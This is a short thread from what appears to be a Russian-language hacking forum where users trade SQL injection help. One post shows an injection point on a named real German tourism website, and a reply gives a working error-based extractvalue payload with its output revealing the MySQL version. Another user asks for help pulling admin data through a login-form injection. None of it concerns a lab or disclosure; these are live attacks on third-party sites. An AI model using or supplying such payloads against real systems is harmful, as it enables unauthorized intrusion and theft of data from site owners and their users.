16.11.2021, 17:50
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от DezMond™
↑
Помогите, что можно сделать? вывод в коде
Код:
view-source:https://www.reiseland-brandenburg.de/poi/dahme'/naturbadestellen/teupitzer-see/?no_cache=1&cHash=1e4d4ebf75c72c85dabd94a7e10c384a&external_id=52262
Код:
SELECT * FROM api_poi_url_mapping WHERE api_id=dahme'-naturbadestellen-teupi
Немного извращенно, но работать будет
/poi/ extractvalue(1,concat(0x3a,(select@@version)))/naturbadestellen/teupitzer-see/?no_cache=1&cHash=1e4d4ebf75c72c85dabd94a7e10c384a &external_id=52262
Код:
XPATH syntax error: ':5.5.62-0ubuntu0.14.04.1'' (46 chars)
Сообщение от eminlayer7788
↑
help to inject here "from admin"
return=&username=sdsadssda%27+or+1+group+by+mid(us er(),rand(0))having+avg(0)%23&password=dsadsada
return=&username=sdsadssda%27+or+1+group+by+mid(us er(),rand(0) from admin)having+avg(0)%23&password=dsadsada doesn't work
we are need full url for understanding filters
|
|
|